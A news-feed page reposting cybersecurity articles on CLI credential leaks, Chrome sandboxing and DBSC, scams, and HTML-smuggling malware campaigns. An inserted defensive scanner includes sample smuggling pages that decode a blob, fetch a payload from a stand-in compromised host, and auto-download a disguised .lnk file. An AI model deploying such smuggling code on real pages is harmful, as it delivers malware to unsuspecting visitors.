Google – INDIA NEWS (https://www.indiavpn.org)

AWS, Google, and Azure CLI Tools Could Leak Credentials in Build Logs
https://www.indiavpn.org/2024/04/16/aws-google-and-azure-cli-tools-could-leak-credentials-in-build-logs/
Tue, 16 Apr 2024 18:35:15 +0000

Apr 16, 2024 | Newsroom | Cloud Security / DevSecOps


New cybersecurity research has found that command-line interface (CLI) tools from Amazon Web Services (AWS) and Google Cloud can expose sensitive credentials in build logs, posing significant risks to organizations.

The vulnerability has been codenamed LeakyCLI by cloud security firm Orca.

“Some commands on Azure CLI, AWS CLI, and Google Cloud CLI can expose sensitive information in the form of environment variables, which can be collected by adversaries when published by tools such as GitHub Actions,” security researcher Roi Nisimi said in a report shared with The Hacker News.

Microsoft addressed the Azure CLI side of the issue in its November 2023 security updates, assigning it the CVE identifier CVE-2023-36052 (CVSS score: 8.6).


The issue, in a nutshell, is that certain CLI commands print the (pre-)defined environment variables of a function or deployment to standard output, and CI/CD (Continuous Integration and Continuous Deployment) pipelines capture that output in their build logs. The affected commands spanning AWS and Google Cloud are listed below:

  • aws lambda get-function-configuration
  • aws lambda get-function
  • aws lambda update-function-configuration
  • aws lambda update-function-code
  • aws lambda publish-version
  • gcloud functions deploy <func> --set-env-vars
  • gcloud functions deploy <func> --update-env-vars
  • gcloud functions deploy <func> --remove-env-vars

Orca said it found several projects on GitHub that inadvertently leaked access tokens and other sensitive data via GitHub Actions, CircleCI, TravisCI, and Cloud Build logs.


Unlike Microsoft, however, both Amazon and Google consider this expected behavior. Their guidance is that organizations should not store secrets in environment variables at all and should instead keep them in a dedicated secrets store such as AWS Secrets Manager or Google Cloud Secret Manager.


Google also recommends the gcloud “--no-user-output-enabled” flag, which suppresses the printing of command output to standard output and standard error.
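The report above lists the affected commands and the mitigations Amazon and Google point to; what a CI job also needs is a way to keep the values those commands print out of its own log. The following Node.js script is an added example (not code from Orca, AWS, or Google) of two checks a build step can make: emit the GitHub Actions `::add-mask::` workflow command for every value in the output of `aws lambda get-function-configuration` before that output is logged, and run a redaction pass over a captured log as a test that nothing slipped through. The JSON sample, the variable names, and their values are constructed for the example; the same treatment applies to the `gcloud functions deploy` output, or that command can be run with the `--no-user-output-enabled` flag mentioned above.

```javascript
'use strict';

// Constructed sample of the JSON that
// `aws lambda get-function-configuration --function-name billing-worker` prints.
// Every value here is made up for the example.
const SAMPLE_AWS_OUTPUT = JSON.stringify({
  FunctionName: 'billing-worker',
  Runtime: 'nodejs18.x',
  Environment: {
    Variables: {
      DB_PASSWORD: 'Sup3rS3cret!',
      STRIPE_API_KEY: 'sk_test_EXAMPLE000000000000000000',
      LOG_LEVEL: 'info',
    },
  },
});

// [name, value] pairs for every environment variable in the command output.
function extractEnvVars(jsonText) {
  const doc = JSON.parse(jsonText);
  const vars = (doc.Environment && doc.Environment.Variables) || {};
  return Object.entries(vars).map(([k, v]) => [k, String(v)]);
}

// GitHub Actions redacts later occurrences of a value once a step has printed
// `::add-mask::<value>`. These lines must reach stdout before the CLI output does.
function maskCommands(pairs) {
  return pairs.filter(([, v]) => v.length > 0).map(([, v]) => `::add-mask::${v}`);
}

// Post-hoc redaction for a captured log. Longest values first, so a value that
// is a prefix of another cannot leave its tail behind.
function redact(logText, pairs) {
  const values = pairs.map(([, v]) => v).filter(Boolean).sort((a, b) => b.length - a.length);
  let out = logText;
  for (const v of values) out = out.split(v).join('***');
  return out;
}

// Number of log lines that still contain any variable value; 0 means clean.
function leakedLineCount(logText, pairs) {
  const values = pairs.map(([, v]) => v).filter(Boolean);
  return logText.split('\n').filter((line) => values.some((v) => line.includes(v))).length;
}

// Usage, in the order a CI step would do it: mask first, then let the command output flow.
const pairs = extractEnvVars(SAMPLE_AWS_OUTPUT);
for (const cmd of maskCommands(pairs)) console.log(cmd);
const capturedLog = '+ aws lambda get-function-configuration --function-name billing-worker\n' + SAMPLE_AWS_OUTPUT;
console.log(`lines leaking before redaction: ${leakedLineCount(capturedLog, pairs)}`);
console.log(redact(capturedLog, pairs));
```

Masking is a backstop, not the fix: a masked value such as `info` also scrubs every unrelated `info` in the log, and a value that is split across lines or re-encoded by a later step is not caught. The durable fix is the one Amazon and Google recommend above, keeping secrets out of environment variables and in a secrets manager, so there is nothing for the CLI to print.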

“If bad actors get their hands on these environment variables, this could potentially lead to viewing sensitive information including credentials, such as passwords, user names, and keys, which could allow them to access any resources that the repository owners can,” Nisimi said.

“CLI commands are by default assumed to be running in a secure environment, but coupled with CI/CD pipelines, they may pose a security threat.”

Google Chrome Adds V8 Sandbox
https://www.indiavpn.org/2024/04/08/google-chrome-adds-v8-sandbox/
Mon, 08 Apr 2024 14:39:04 +0000

Apr 08, 2024 | Newsroom | Software Security / Cybersecurity


Google has announced support for what’s called a V8 Sandbox in the Chrome web browser in an effort to address memory corruption issues.

The sandbox, according to V8 Security technical lead Samuel Groß, aims to prevent “memory corruption in V8 from spreading within the host process.”

The search behemoth has described V8 Sandbox as a lightweight, in-process sandbox for the JavaScript and WebAssembly engine that’s designed to mitigate common V8 vulnerabilities.

The idea is to limit the impact of V8 vulnerabilities by restricting the code executed by V8 to a subset of the process’ virtual address space (“the sandbox”) and isolating it from the rest of the process.


Shortcomings affecting V8 have accounted for a significant chunk of the zero-day vulnerabilities that Google has addressed between 2021 and 2023, with as many as 16 security flaws discovered over the time period.

“The sandbox assumes that an attacker can arbitrarily and concurrently modify any memory inside the sandbox address space as this primitive can be constructed from typical V8 vulnerabilities,” the Chromium team said.

“Further, it is assumed that an attacker will be able to read memory outside of the sandbox, for example, through hardware side channels. The sandbox then aims to protect the rest of the process from such an attacker. As such, any corruption of memory outside of the sandbox address space is considered a sandbox violation.”

Groß emphasized that V8's vulnerabilities are hard to address by switching to a memory-safe language like Rust or by hardware memory-safety approaches such as memory tagging, because most of them are “subtle logic issues” that can be exploited to corrupt memory, unlike classic memory-safety bugs such as use-after-frees and out-of-bounds accesses.


“Nearly all vulnerabilities found and exploited in V8 today have one thing in common: the eventual memory corruption necessarily happens inside the V8 heap because the compiler and runtime (almost) exclusively operate on V8 HeapObject instances,” Groß said.

Since such issues cannot be caught by the techniques used against typical memory-corruption vulnerabilities, the V8 Sandbox instead isolates V8's heap memory so that any memory corruption that does occur cannot escape those confines and reach other parts of the process' memory.

This is accomplished by replacing every data type that can access out-of-sandbox memory with a “sandbox-compatible” alternative, such as offsets relative to the sandbox base instead of raw pointers within the sandbox, and table indices instead of raw pointers to objects outside it, so that even an attacker with arbitrary read/write inside the sandbox cannot reach other memory. For a local build, the sandbox is enabled by setting “v8_enable_sandbox” to true in the gn args.

Benchmark results from Speedometer and JetStream show that the security feature adds an overhead of about 1% on typical workloads, allowing it to be enabled by default starting with Chrome version 123, spanning Android, ChromeOS, Linux, macOS, and Windows.

“The V8 Sandbox requires a 64-bit system as it needs to reserve a large amount of virtual address space, currently one terabyte,” Groß said.


“The sandbox is motivated by the fact that current memory safety technologies are largely inapplicable to optimizing JavaScript engines. While these technologies fail to prevent memory corruption in V8 itself, they can in fact protect the V8 Sandbox attack surface. The sandbox is therefore a necessary step towards memory safety.”

The development comes as Google highlighted the role of the Kernel Address Sanitizer (KASan) in detecting memory bugs in native code and hardening Android firmware, noting that it has used the compiler-based tool to discover more than 40 bugs.

“Using KASan enabled builds during testing and/or fuzzing can help catch memory corruption vulnerabilities and stability issues before they land on user devices,” Eugene Rodionov and Ivan Lozano from the Android team said.

Google Sues App Developers Over Fake Crypto Investment App Scam
https://www.indiavpn.org/2024/04/08/google-sues-app-developers-over-fake-crypto-investment-app-scam/
Mon, 08 Apr 2024 05:58:55 +0000

Apr 08, 2024 | Newsroom | Investment Scam / Mobile Security


Google has filed a lawsuit against two app developers for engaging in an “international online consumer investment fraud scheme” that tricked users into downloading bogus Android apps from the Google Play Store and other sources, then stole their funds under the guise of promising high returns.

The individuals in question are Yunfeng Sun (aka Alphonse Sun) and Hongnam Cheung (aka Zhang Hongnim or Stanford Fischer), who are believed to be based in Shenzhen and Hong Kong, respectively.

The defendants are said to have uploaded about 87 crypto apps to the Play Store to pull off the social engineering scam since at least 2019; the apps were downloaded by over 100,000 users and led to substantial financial losses.

“The gains conveyed by the apps were illusory,” the tech giant said in its complaint. “And the scheme did not end there.”


“Instead, when individual victims attempted to withdraw their balances, defendants and their confederates would double down on the scheme by requesting various fees and other payments from victims that were supposedly necessary for the victims to recover their principal investments and purported gains.”

While this kind of scam is typically referred to as pig butchering (aka shā zhū pán), Google said it “neither adopts nor endorses the use of this term.” It’s derived from the idea that victims are fattened up like hogs with the promise of lucrative returns before “slaughtering” them for their assets.

In September 2023, the U.S. Financial Crimes Enforcement Network (FinCEN) said these scams are perpetrated by criminal enterprises based in Southeast Asia that employ hundreds of thousands of people who are trafficked to the region by promising them high-paying jobs.

In such schemes, scammers use elaborate fictitious personas to approach targets via social media or dating platforms, dangling the prospect of a romantic relationship to build trust. They then persuade the victim to invest in cryptocurrency portfolios that purport to deliver high profits in a short time, and steal the funds.

To create the appearance of legitimacy, the financially motivated actors are known to fabricate websites and mobile apps to display a bogus investment portfolio with large returns.

Sun and Cheung, said Google, lured victim investors to download their fraudulent apps through text messages using Google Voice to target victims in the U.S. and Canada. Other distribution methods include affiliate marketing campaigns that offer commissions for “signing up additional users” and YouTube videos promoting the fake investment platforms.

The company described the malicious activity as persistent and continuing, with the defendants “using varying computer network infrastructure and accounts to obfuscate their identities, and making material misrepresentations to Google in the process.”


It also accused them of violating the Racketeer Influenced and Corrupt Organizations Act (RICO), carrying out wire fraud, and breaching the Google Play App Signing Terms of Service, Developer Program Policies, YouTube’s Community Guidelines, as well as the Google Voice Acceptable Use Policy.

“Google Play can continue to be an app-distribution platform that users want to use only if users feel confident in the integrity of the apps,” Google added. “By using Google Play to conduct their fraud scheme, defendants have threatened the integrity of Google Play and the user experience.”

It’s worth noting that the problem is not limited to the Android ecosystem alone, as prior reports show that such bogus apps have also repeatedly made their way to the Apple App Store.

The development is the latest in a series of legal actions that Google has taken to curb the misuse of its products. In November 2023, the company sued multiple individuals in India and Vietnam for distributing fake versions of its Bard AI chatbot (now rebranded as Gemini) to propagate malware via Facebook.

Google Chrome Beta Tests New DBSC Protection Against Cookie-Stealing Attacks
https://www.indiavpn.org/2024/04/03/google-chrome-beta-tests-new-dbsc-protection-against-cookie-stealing-attacks/
Wed, 03 Apr 2024 14:19:16 +0000

Apr 03, 2024 | Newsroom | Browser Security / Session Hijacking


Google on Tuesday said it’s piloting a new feature in Chrome called Device Bound Session Credentials (DBSC) to help protect users against session cookie theft by malware.

The prototype – currently tested against “some” Google Account users running Chrome Beta – is built with an aim to make it an open web standard, the tech giant’s Chromium team said.

“By binding authentication sessions to the device, DBSC aims to disrupt the cookie theft industry since exfiltrating these cookies will no longer have any value,” the company noted.

“We think this will substantially reduce the success rate of cookie theft malware. Attackers would be forced to act locally on the device, which makes on-device detection and cleanup more effective, both for anti-virus software as well as for enterprise managed devices.”

The development follows reports that off-the-shelf information-stealing malware is harvesting session cookies, which lets threat actors bypass multi-factor authentication (MFA) and gain unauthorized access to online accounts, since a stolen session cookie stands in for an already completed login.


Such session hijacking techniques are not new. In October 2021, Google’s Threat Analysis Group (TAG) detailed a phishing campaign that targeted YouTube content creators with cookie stealing malware to hijack their accounts and monetize the access for perpetrating cryptocurrency scams.

Earlier this January, CloudSEK revealed that information stealers like Lumma, Rhadamanthys, Stealc, Meduza, RisePro, and WhiteSnake have updated their capabilities to hijack user sessions and allow continuous access to Google services even after a password reset.

Google told The Hacker News at the time that “attacks involving malware that steal cookies and tokens are not new; we routinely upgrade our defenses against such techniques and to secure users who fall victim to malware.”

It further recommended that users enable Enhanced Safe Browsing in the Chrome web browser to protect against phishing and malware downloads.

DBSC aims to blunt such attacks by cryptographically binding a session to the device on which it was created, so that a cookie exfiltrated to another machine no longer suffices to hijack the account.


Offered via an API, the new feature achieves this by allowing a server to associate a session with a public key created by the browser as part of a public/private key pair when a new session is launched.

The private key of that pair is generated and held locally in the device's Trusted Platform Module (TPM), so malware on the host cannot read it out. The DBSC API also lets the server periodically verify proof-of-possession of the private key throughout the session's lifetime, confirming that the session is still being used from the same device.

“DBSC offers an API for websites to control the lifetime of such keys, behind the abstraction of a session, and a protocol for periodically and automatically proving possession of those keys to the website’s servers,” Google’s Kristian Monsen and Arnar Birgisson said.

“There is a separate key for each session, and it should not be possible to detect that two different session keys are from one device. By device-binding the private key and with appropriate intervals of the proofs, the browser can limit malware’s ability to offload its abuse off of the user’s device, significantly increasing the chance that either the browser or server can detect and mitigate cookie theft.”


One crucial caveat is that DBSC banks on user devices having a secure way of signing challenges while protecting private keys from exfiltration by malware, necessitating that the web browser has access to the TPM.

Google said support for DBSC will be initially rolled out to roughly half of Chrome’s desktop users based on the hardware capabilities of their machines. The latest project is also expected to be in sync with the company’s broader plans to sunset third-party cookies in the browser by the end of the year via the Privacy Sandbox initiative.

“This is to make sure that DBSC does not become a new tracking vector once third-party cookies are phased out, while also ensuring that such cookies can be fully protected in the meantime,” it said. “If the user completely opts out of cookies, third-party cookies, or cookies for a specific site, this will disable DBSC in those scenarios as well.”

The company further noted that it's engaging with several server providers, identity providers (IdPs) such as Okta, and browser vendors such as Microsoft Edge, all of which have expressed interest in DBSC. Origin trials for DBSC for all supported websites are set to commence by the end of the year.

Google to Delete Billions of Browsing Records in ‘Incognito Mode’ Privacy Lawsuit Settlement
https://www.indiavpn.org/2024/04/02/google-to-delete-billions-of-browsing-records-in-incognito-mode-privacy-lawsuit-settlement/
Tue, 02 Apr 2024 08:14:42 +0000

Apr 02, 2024 | Newsroom | Browser Security / Data Security


Google has agreed to purge billions of data records reflecting users’ browsing activities to settle a class action lawsuit that claimed the search giant tracked them without their knowledge or consent in its Chrome browser.

The class action, filed in 2020, alleged the company misled users who believed their browsing remained private when using the “incognito” or “private” mode of web browsers like Chrome, while it continued to track their internet activity.

In late December 2023, it emerged that the company had consented to settle the lawsuit. The deal is currently pending approval by the U.S. District Judge Yvonne Gonzalez Rogers.

“The settlement provides broad relief regardless of any challenges presented by Google’s limited record keeping,” a court filing on April 1, 2024, said.

“Much of the private browsing data in these logs will be deleted in their entirety, including billions of event level data records that reflect class members’ private browsing activities.”


As part of the data remediation process, Google is also required to delete information that makes private browsing data identifiable by redacting data points like IP addresses, generalizing User-Agent strings, and removing detailed URLs within a specific website (i.e., retaining only the domain-level portion of the URL).

In addition, it has been asked to delete the so-called X-Client-Data header field, which Google described as a Chrome-Variations header that captures the “state of the installation of Chrome itself, including active variations, as well as server-side experiments that may affect the installation.”

This header is generated from a randomized seed value, making it potentially unique enough to identify specific Chrome users.

Other settlement terms require Google to block third-party cookies within Chrome’s Incognito Mode for five years, a setting the company has already implemented for all users. The tech company has separately announced plans to eliminate tracking cookies by default by the end of the year.

Google updated the wording of Incognito Mode in January 2024 to clarify that the setting does not change “how data is collected by websites you visit and the services they use, including Google.”


The lawsuit extracted admissions from Google employees that characterized the browser’s Incognito browsing mode as a “confusing mess,” “effectively a lie,” and a “problem of professional ethics and basic honesty.”

It further laid bare internal exchanges in which executives argued Incognito Mode shouldn’t be called “private” because it risked “exacerbating known misconceptions.”

The development comes as Google said it has started automatically blocking bulk senders in Gmail that don’t meet its Email sender guidelines in an attempt to cut down on spam and phishing attacks.

The new requirements make it mandatory for email senders who push out more than 5,000 messages per day to Gmail accounts to provide a one-click unsubscribe option and respond to unsubscription requests within two days.

Hackers Using Sneaky HTML Smuggling to Deliver Malware via Fake Google Sites
https://www.indiavpn.org/2024/03/18/hackers-using-sneaky-html-smuggling-to-deliver-malware-via-fake-google-sites/
Mon, 18 Mar 2024 12:56:41 +0000


Cybersecurity researchers have discovered a new malware campaign that leverages bogus Google Sites pages and HTML smuggling to distribute a commercial malware called AZORult in order to facilitate information theft.

“It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website,” Netskope Threat Labs researcher Jan Michael Alcantara said in a report published last week.

The phishing campaign has not been attributed to a specific threat actor or group. The cybersecurity company described it as widespread in nature, carried out with the intent of collecting sensitive data to sell in underground forums.

AZORult, also called PuffStealer and Ruzalto, is an information stealer first detected around 2016. It’s typically distributed via phishing and malspam campaigns, trojanized installers for pirated software or media, and malvertising.


Once installed, it can gather credentials, cookies, and history from web browsers; take screenshots; collect documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX); and harvest data from 137 cryptocurrency wallets. AXX files are encrypted files created by AxCrypt, while KDBX refers to a password database created by the KeePass password manager.

The latest attack activity involves the threat actor creating counterfeit Google Docs pages on Google Sites that subsequently utilize HTML smuggling to deliver the payload.

HTML smuggling is a stealthy delivery technique that abuses legitimate HTML5 and JavaScript features to assemble and launch malware inside the browser: the page carries (or fetches) an encoded payload, script decodes it into bytes, wraps them in a Blob, and triggers a download through a generated link, so the executable is never sent over the wire as a file.

Thus, when a visitor is tricked into opening the rogue page from a phishing email, the browser decodes the script and materializes the payload on the host device. Because the malicious file never crosses the network as a recognizable attachment, controls such as email gateways that inspect attachments do not see it.

The AZORult campaign takes this approach a notch higher by adding a CAPTCHA barrier, an approach that not only gives a veneer of legitimacy but also serves as an additional layer of protection against URL scanners.

The downloaded file is a Windows shortcut (.LNK) masquerading as a PDF bank statement; launching it kicks off a chain of intermediate batch and PowerShell scripts fetched from an already compromised domain.


One of the PowerShell scripts (“agent3.ps1”) is designed to fetch the AZORult loader (“service.exe”), which, in turn, downloads and executes another PowerShell script (“sd2.ps1”) containing the stealer malware.

“It executes the fileless AZORult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts,” Alcantara said. “It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.”

“Unlike common smuggling files where the blob is already inside the HTML code, this campaign copies an encoded payload from a separate compromised site. Using legitimate domains like Google Sites can help trick the victim into believing the link is legitimate.”
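As an added example that is not from Netskope, a small Node.js indicator scanner for HTML-smuggling pages of the kind described above. It looks in a page for the building blocks the technique needs: base64 decoding, assembling bytes into a Blob, an object URL, a forced download, and either a large inline base64 string (the classic form) or a fetch() of an off-site JSON document (the variant in this campaign). The three HTML samples, the indicator list, the weights, and the threshold are all constructed for this example.

```javascript
'use strict';

// Indicators an HTML-smuggling page needs. Names, patterns and weights are this
// example's own choices, tuned for readability rather than for a production ruleset.
const INDICATORS = [
  { name: 'base64-decode',   re: /\batob\s*\(/,                                   weight: 2 },
  { name: 'byte-array',      re: /\bUint8Array\b|\bcharCodeAt\s*\(/,              weight: 1 },
  { name: 'blob-build',      re: /new\s+Blob\s*\(/,                               weight: 2 },
  { name: 'object-url',      re: /URL\.createObjectURL\s*\(/,                     weight: 2 },
  { name: 'forced-download', re: /\.download\s*=|\bdownload\s*=\s*["']/i,         weight: 2 },
  { name: 'auto-click',      re: /\.click\s*\(\s*\)/,                             weight: 1 },
  // Classic form: the payload is a long base64 string inside the page itself.
  { name: 'inline-blob',     re: /["'][A-Za-z0-9+/]{400,}={0,2}["']/,             weight: 2 },
  // Variant in this campaign: the payload is fetched from a JSON file on another site.
  { name: 'external-json',   re: /fetch\s*\(\s*["']https?:\/\/[^"']+\.json["']/i, weight: 2 },
];
const THRESHOLD = 6; // a page needs the decode + assemble + deliver chain to reach it

// Score one HTML document. Returns the matched indicator names, the total weight,
// and a verdict; a caller can log the names for triage.
function scanHtml(html) {
  const hits = INDICATORS.filter(({ re }) => re.test(html));
  const score = hits.reduce((sum, h) => sum + h.weight, 0);
  return { score, hits: hits.map((h) => h.name), suspicious: score >= THRESHOLD };
}

// Constructed sample 1: classic inline-blob smuggling (a fake "statement" download).
const INLINE_SMUGGLE = `<html><body><script>
var b64 = '${'A'.repeat(600)}';
var bin = atob(b64); var bytes = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
var blob = new Blob([bytes], {type: 'application/octet-stream'});
var a = document.createElement('a'); a.href = URL.createObjectURL(blob);
a.download = 'Statement.pdf.lnk'; document.body.appendChild(a); a.click();
</script></body></html>`;

// Constructed sample 2: the external-JSON variant; the blob is not in the page.
const EXTERNAL_JSON_SMUGGLE = `<html><body><script>
fetch('https://compromised-site.example/assets/data.json')
  .then(function (r) { return r.json(); })
  .then(function (j) {
    var bin = atob(j.data); var bytes = new Uint8Array(bin.length);
    for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
    var a = document.createElement('a');
    a.href = URL.createObjectURL(new Blob([bytes])); a.download = 'Statement.pdf.lnk'; a.click();
  });
</script></body></html>`;

// Constructed sample 3: a benign page with a normal download link and an API call.
const BENIGN_PAGE = `<html><body>
<a href="/files/report.pdf" download="report.pdf">Download report</a>
<script>fetch('/api/status').then(function (r) { return r.json(); }).then(function (s) { document.title = s.name; });</script>
</body></html>`;

// Usage: scan all three and print the triage view.
for (const [label, html] of [['inline', INLINE_SMUGGLE], ['external-json', EXTERNAL_JSON_SMUGGLE], ['benign', BENIGN_PAGE]]) {
  const r = scanHtml(html);
  console.log(`${label}: score=${r.score} suspicious=${r.suspicious} hits=${r.hits.join(',')}`);
}
```

Indicator matching of this kind is cheap enough to run on HTML captured at a mail gateway or proxy, but it is a triage signal, not proof: obfuscated scripts (string splitting, `window['at'+'ob']`) dodge fixed regexes, which is why sandboxed detonation or, for the external-JSON variant, fetching and inspecting the referenced resource is the stronger control.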

The findings come as Cofense revealed the use of malicious SVG files by threat actors in recent campaigns to disseminate Agent Tesla and XWorm using an open-source program called AutoSmuggle that simplifies the process of crafting HTML or SVG smuggled files.


AutoSmuggle “takes a file such as an exe or an archive and ‘smuggles’ it into the SVG or HTML file so that when the SVG or HTML file is opened, the ‘smuggled’ file is delivered,” the company explained.

Phishing campaigns have also been observed employing shortcut files packed within archive files to propagate LokiBot, an information stealer analogous to AZORult with features to harvest data from web browsers and cryptocurrency wallets.

“The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and living-off-the-land (LotL) techniques in past campaigns,” SonicWall disclosed last week.

In another instance highlighted by Docguard, malicious shortcut files have been found to initiate a series of payload downloads and ultimately deploy AutoIt-based malware.

That’s not all. Users in the Latin American region are being targeted as part of an ongoing campaign in which the attackers impersonate Colombian government agencies to send booby-trapped emails with PDF documents that accuse the recipients of flouting traffic rules.

The PDF contains a link that, when clicked, downloads a ZIP archive containing a VBScript. When executed, the VBScript drops a PowerShell script that fetches one of several remote access trojans, such as AsyncRAT, njRAT, or Remcos.

Google Introduces Enhanced Real-Time URL Protection for Chrome Users
https://www.indiavpn.org/2024/03/15/google-introduces-enhanced-real-time-url-protection-for-chrome-users/
Fri, 15 Mar 2024 08:37:44 +0000

Mar 15, 2024 | Newsroom | Browser Security / Phishing Attack


Google on Thursday announced an enhanced version of Safe Browsing to provide real-time, privacy-preserving URL protection and safeguard users from visiting potentially malicious sites.

“The Standard protection mode for Chrome on desktop and iOS will check sites against Google’s server-side list of known bad sites in real-time,” Google’s Jonathan Li and Jasika Bawa said.

“If we suspect a site poses a risk to you or your device, you’ll see a warning with more information. By checking sites in real time, we expect to block 25% more phishing attempts.”

Until now, Chrome used a locally stored list of known unsafe sites, updated every 30 to 60 minutes, and compared a hash of every visited site against that local database.


Google first revealed its plans to switch to real-time server-side checks without sharing users’ browsing history with the company in September 2023.

The change, the search giant said, is motivated by the rapid growth of the list of harmful websites and by the fact that 60% of phishing domains exist for less than 10 minutes, which a list refreshed every half hour or so cannot keep up with.

“Not all devices have the resources necessary to maintain this growing list, nor are they always able to receive and apply updates to the list at the frequency necessary to benefit from full protection,” it added.

Thus, with the new architecture, every time a user attempts to visit a website, the URL is checked against the browser’s global and local caches containing known safe URLs and the results of previous Safe Browsing checks in order to determine the site’s status.


If the visited URL is absent from the caches, a real-time check is performed: the URL is hashed (SHA-256) into 32-byte full hashes, which are truncated to 4-byte hash prefixes, encrypted, and sent to a privacy server.

“The privacy server removes potential user identifiers and forwards the encrypted hash prefixes to the Safe Browsing server via a TLS connection that mixes requests with many other Chrome users,” Google explained.

The Safe Browsing server subsequently decrypts the hash prefixes and matches them against the server-side database to return full hashes of all unsafe URLs that match one of the hash prefixes sent by the browser.


Finally, on the client side, the full hashes are compared against the full hashes of the visited URL, and a warning message is displayed if a match is found.

Google also confirmed that the privacy server is an Oblivious HTTP (OHTTP) relay operated by Fastly that sits between Chrome and the Safe Browsing server, so that the latter never sees users' IP addresses and cannot correlate the hash-prefix checks with a user's browsing history.

“Ultimately, Safe Browsing sees the hash prefixes of your URL but not your IP address, and the privacy server sees your IP address but not the hash prefixes,” the company emphasized. “No single party has access to both your identity and the hash prefixes. As such, your browsing activity remains private.”

Watch Out for Spoofed Zoom, Skype, Google Meet Sites Delivering Malware
https://www.indiavpn.org/2024/03/07/watch-out-for-spoofed-zoom-skype-google-meet-sites-delivering-malware/
Thu, 07 Mar 2024 06:47:17 +0000

Mar 07, 2024 | Newsroom | Malware / Network Security


Threat actors have been leveraging fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to deliver a variety of malware targeting both Android and Windows users since December 2023.

“The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems,” Zscaler ThreatLabz researchers said.

The spoofed sites are in Russian and are hosted on domains that closely resemble their legitimate counterparts, indicating that the attackers are using typosquatting tricks to lure prospective victims into downloading the malware.


They also come with options to download the app for Android, iOS, and Windows platforms. While clicking on the button for Android downloads an APK file, clicking on the Windows app button triggers the download of a batch script.

The malicious batch script is responsible for executing a PowerShell script, which, in turn, downloads and executes the remote access trojan.

Currently, there is no evidence that the threat actor is targeting iOS users, given that clicking on the button for the iOS app takes the user to the legitimate Apple App Store listing for Skype.

“A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files,” the researchers said.

The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a new malware dubbed WogRAT targeting both Windows and Linux is abusing a free online notepad platform called aNotepad as a covert vector for hosting and retrieving malicious code.


It’s said to have been active since at least late 2022, targeting Asian countries such as China, Hong Kong, Japan, and Singapore, among others. That said, it’s currently not known how the malware is distributed in the wild.

“When WogRAT is run for the first time, it collects basic information of the infected system and sends them to the C&C server,” ASEC said. “The malware then supports commands such as executing commands, sending results, downloading files, and uploading these files.”

It also coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal actor known as TA4903 to steal corporate credentials and likely follow them with business email compromise (BEC) attacks. The adversary has been active since at least 2019, with the activity intensifying after mid-2023.

“TA4903 routinely conducts campaigns spoofing various U.S. government entities to steal corporate credentials,” Proofpoint said. “The actor also spoofs organizations in various sectors including construction, finance, healthcare, food and beverage, and others.”


Attack chains involve the use of QR codes (aka quishing) for credential phishing as well as relying on the EvilProxy adversary-in-the-middle (AiTM) phishing kit to bypass two-factor authentication (2FA) protections.

Once a target mailbox is compromised, the threat actor has been observed searching for information relevant to payments, invoices, and bank information, with the ultimate goal of hijacking existing email threads and performing invoice fraud.

Phishing campaigns have also functioned as a conduit for other malware families like DarkGate, Agent Tesla, and Remcos RAT, the last of which leverages steganographic decoys to drop the malware on compromised hosts.


How to Find and Fix Risky Sharing in Google Drive (https://www.indiavpn.org/2024/03/06/how-to-find-and-fix-risky-sharing-in-google-drive/, Wed, 06 Mar 2024 11:41:12 +0000)

Mar 06, 2024 | The Hacker News | Data Security / Cloud Security

Risky Sharing in Google Drive

Every Google Workspace administrator knows how quickly Google Drive becomes a messy sprawl of loosely shared confidential information. This isn’t anyone’s fault; it’s inevitable as your productivity suite is purposefully designed to enable real-time collaboration – both internally and externally.

For Security & Risk Management teams, the untenable risk of any Google Drive footprint lies in the toxic combinations of sensitive data, excessive permissions, and improper sharing. However, it can be challenging to differentiate between typical business practices and potential risks without fully understanding the context and intent.

Material Security, a company renowned for its innovative method of protecting sensitive data within employee mailboxes, has recently launched Data Protection for Google Drive to safeguard the sprawl of confidential information scattered throughout Google Drive with a powerful discovery and remediation toolkit.

How Material Security helps organizations safeguard Google Drive

Trying to answer fundamental questions about what’s in Google Drive and where it’s shared is painstakingly manual using the Workspace admin dashboard, and working with the Drive API is costly and complex. Given the breadth of sensitive content, this is an area that warrants focus, but it’s challenging to get to the depth required.

Material is backed by a powerful data platform that syncs with your Google Workspace tenant to build out a structured model of historical file contents, metadata, permissions, and sharing settings that is kept up-to-date based on ongoing activity. This data platform enables in-depth inspection that wouldn’t be possible by interfacing with the Drive API alone. With this data platform as the foundation, Material:

  • Scans file contents against a set of custom-built, ML-based detection rules to identify and classify sensitive content across a wide range of PII, PCI, PHI, and other confidential data categories
  • Calculates file and folder permission sets and sharing settings to build a unified access model that is easier to understand and demonstrate for compliance
  • Enables automated access revocation based on precise search results and activity triggers to continuously reduce the risk profile

The precision of Material allows you to effectively wrangle such a complex and vast data repository without getting in the way of daily use – security without impacting productivity. See it for yourself.

Illuminate blind spots across your Google Drive footprint

With a powerful data platform as the foundation, you gain an expressive search interface that guides you through your Google Drive footprint to identify toxic combinations worthy of investigation. You can search against file metadata, ownership, content, location, and sharing to answer questions such as:

  • Show me every file that contains financial records that are shared externally
  • Show me every file viewable via a public link that contains PII
  • Show me every file accessible by these users who are departing the company next week
  • Show me every file with confidential information that’s shared with a Gmail address
  • Show me every file in a Shared Drive that contains health records

As you illuminate more of those dangerous blind spots, you continuously gain a more complete view of the environment with heightened security posture – the types of things that make it easier to sleep at night.

Block exfiltration paths with automated remediation

The primary remediation mode to fix toxic combinations in Google Drive is to revoke access. That sounds easy on the surface, but when you consider the conditions of the whole space, it becomes a multi-dimensional puzzle. When is external sharing valid and when is it not? Are there users that belong to groups that they shouldn’t? Which settings should change when a document is modified to add confidential information?

Precise search and activity-based filtering enables remediation workflows for scenarios such as:

